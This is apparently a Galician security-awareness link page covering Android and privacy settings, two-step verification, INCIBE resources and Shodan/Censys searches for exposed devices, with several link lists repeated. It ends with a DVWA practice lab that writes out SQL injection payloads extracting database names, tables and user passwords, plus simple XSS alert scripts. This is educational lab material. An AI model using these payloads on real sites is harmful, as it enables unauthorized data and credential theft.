Artigos novos
Archive for outubro 2018
Android
configurar android da forma máis segura actualizar as aplicacións
cómo actualizar cómo actualizar Android á súa última versión
centro de seguridade Google control parental
elixe o tipo de seguridade para o bloqueo da pantalla Antivirus informe Antivirus
por qué e cómo configurar unha VPN
Navegadores (Privacidade)
brave bloqueo de seguimentos, publicidade e scripts (tamén en Android e iPhone)
actualizacións Microsoft Windows
operacións de banca online
Verificación en dous pasos
Despois de introducir o usuario e contrasinal para iniciar sesión nunha aplicación ou servizo necesitaremos confirmar que somos nós utilizando un código adicional
Facebook verificación en dous pasos Google Google Instagram
Microsoft / Outlook Apple Amazon Autodesk Dropbox eBay
verificación de inicio de sesión en Twitter LinkedIn
clave de seguridade de PayPal autenticación en dous factores en PayPal
en WhatsApp temos que ir a Axustes, conta, Verificación en dous pasos
PlayStation
Solucións - INCIBE
servizo antibotnet servizo antiransomware
¿sabes cómo se protexen as empresas do teu sector? RXPD para pemes
¿coñeces os teus riscos? políticas de seguridade Kit de concienciación
RXPD para pequenas e medianas empresas Plan Director de seguridade
boas prácticas protexe @s client@s
desenvolver cultura en seguridade fraude e xestión da identidade online
contramedidas electrónicas cumplimento legal
protección da información protección do posto de traballo
protexe a túa web
protección en mobilidade e conexións inalámbricas
plan de continxencia e continuidade de negocio
configurar android da forma máis segura actualizar as aplicacións
cómo actualizar cómo actualizar Android á súa última versión
centro de seguridade Google control parental
elixe o tipo de seguridade para o bloqueo da pantalla Antivirus informe Antivirus
por qué e cómo configurar unha VPN
Navegadores (Privacidade)
brave bloqueo de seguimentos, publicidade e scripts (tamén en Android e iPhone)
epic privace browser navegador con orixe Chromium que bloquea o criptominado oculto, a publicidade e tecnoloxías de rastreo. Ten a súa propia VPN para evitar a nosa xeolocalización e emprega proxy para evitar o rastrexo.
SRWare Iron navegador con orixe Chromium, bloquea a publicidade, elimina as opcións de rastrexo e seguemento e permite simular que nos conectamos con outro dispositivo
Tor Browser os sitios webs non saberán a nosa dirección IP e tampouco dende onde nos conectamos
Conectarmos mediante unha versión adaptada de Firefox e unha app que nos conectará cos proxys externos. Documentación de Tor
actualizacións Microsoft Windows
operacións de banca online
Verificación en dous pasos
Despois de introducir o usuario e contrasinal para iniciar sesión nunha aplicación ou servizo necesitaremos confirmar que somos nós utilizando un código adicional
Facebook verificación en dous pasos Google Google Instagram
Microsoft / Outlook Apple Amazon Autodesk Dropbox eBay
verificación de inicio de sesión en Twitter LinkedIn
clave de seguridade de PayPal autenticación en dous factores en PayPal
en WhatsApp temos que ir a Axustes, conta, Verificación en dous pasos
PlayStation
Solucións - INCIBE
servizo antibotnet servizo antiransomware
¿sabes cómo se protexen as empresas do teu sector? RXPD para pemes
¿coñeces os teus riscos? políticas de seguridade Kit de concienciación
RXPD para pequenas e medianas empresas Plan Director de seguridade
boas prácticas protexe @s client@s
desenvolver cultura en seguridade fraude e xestión da identidade online
contramedidas electrónicas cumplimento legal
protección da información protección do posto de traballo
protexe a túa web
protección en mobilidade e conexións inalámbricas
plan de continxencia e continuidade de negocio
Shodan detecta calquer dispositivo que se conecta a internet con configuracións vulnerables ou de fábrica. Para obter resultados sen limitacións deberase pagar unha cuota. Un buscador para detectar fugas de información
o buscador favorito
o teu dispositivo en internet expoñendo a privacidade no IoT títulos en HTMLo buscador favorito
backups de vidas online cámaras Wi-Fi sistemas de control escritorio remoto
cómo averiguar números de teléfono cidades expostas
comproba os teus dispositivos vulnerables guía de boas prácticas de seguridade
sistemas industriais PCL
conta Twitter do fundador
¿qué é? crear alertas (de pago)
interface liña de comandos exploits developer Mapas
ICS barcos versión simple
Exposición por países España USA Portugal
información aleatoria sobre un dispositivo IoT vulnerable conectado
Exemplos
dispositivos con captura de pantalla habilitada cámaras netcam webcam
Android
hostname nomes persoas
devasas web
routers con almacenamento USB servidores VNC sen autenticación
ICS / SCADA SCADA PCWork
Paneis de Control servidores web con interface Web
CPanel (2082, 2083) WHM (2086, 2087) Webmin (1000)
Drones FMV
Proveedor de Servizos de Internet
Parques eólicos
Informes
vulnerables a Heartbleed D-Link Smart TV Fire TV Kodi
Maltego
censys só permite 10 búsquedas diarias sen rexistrar
censys exemplos guía de seguridade
o poder da información SCADA cámaras ip
bases de datos impresoras impresoras sen contrasinais modelos de impresoras
modelos impresoras
ZoomEye webcams
Contramedidas
cómo evitar que os teus dispositivos se usen en ciberataques IoT Scanner
6 consellos para protexer a seguridade das webcams
medidas a adoptar
DVWA
é unha aplicación web PHP e MySQL para o entrenamento de explotación de vulnerabilidades web nun entorno controlado e de maneira legal
DVWA DVWA online default login: admin - password
Se queremos modificar o directorio de destino teremos que modificar dentro do arquivo httpd.conf ( c:\wamp\bin\apache\Apachexx\conf )
os parámetros:
DocumentRoot e Directory Cómo configurar sitios web en WampServer
Temos que ir ao directorio c:\wamp\www\DVWA\config e renomear o arquivo como config.inc.php e renomear a entrada db_password como ='';
e finalmente pulsar o botón "crear a base de datos"
Para poder executar DVWA correctamente debemos realizar as seguintes accións:
1.- Arrancar o servidor Apache: service apache2 start
2.- Arrancar o motor da base de datos: service mysql start
3.- Acceder á ruta da aplicación web vulnerable: localhost/dvwa ou 127.0.0.1/dvwa/
DVWA Security: low
(Só utilizar en DVWA para fins académicos e aprendizaxe.
NUNCA utilizar en ningunha páxina web sen autorización xa que poderá supoñer problemas legais)
Exemplos
SQL Injection: ' or 1=1# 1' UNION SELECT 1,2#
1' UNION SELECT 1,(select database());#
1' UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata;#
se ao teclear www.paxinaproba.com/index.php?id=2' a web será vulnerable se mostra un erro similar a este: You have an error in your SQL syntax;
se probamos a poñer un número calquera amósanos o ID, o nome e o apelido, polo tanto poderíamos saber cantos usuarios ten a base de datos.
(Neste caso sabemos que a base de datos ten 5 usuarios porque se poñemos 6 ou un número maior non devolve nada)
Sabemos que ten 2 columnas porque ao poñer a seguinte da erro: 1' and 1=0 order by 3 #
Confirmámolo, inxectando algo nas 2 columnas: 1' and 1=0 union select 1,2 #
Tamén podemos inxectar unha cadea de caracteres:
1' and 1=0 union select 'Boas','Estamos de PROBAS' #
versión da base de datos: 1' and 1=0 union select null,Version() #
tamén funciona: ' union select null, @@version #
nome da base de datos: 1' and 1=0 union select null,database() #
' union select null, database() #
Hostname: ' union select null, @@hostname #
Usuario: ' union all select current_user(), user() #
' union all select system_user(), user() #
nomes das tablas: (sabemos así que existe unha tabla "users")
1' and 1=0 union select null,table_name from information_schema.tables where table_schema!='msql' and table_schema!='information_schema'#
1' and 1=1 union select null, table_name from information_schema.tables #
nomes dos usuarios:
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
' union select null, column_name from information_schema.columns where table_name = 'users' #
usuarios e contrasinais: 1' and 1=0 union select null,concat(user,0x0a,password) from users #
1' and 1=1 union select user, password from users #
XSS Reflected: (para practicar XSS nunha aplicación web)
<script>alert('de proba')</script>
XSS Stored: (formulario web)
en Mensaxe teclear: <script>alert('CeMIT, Cuntis')</script>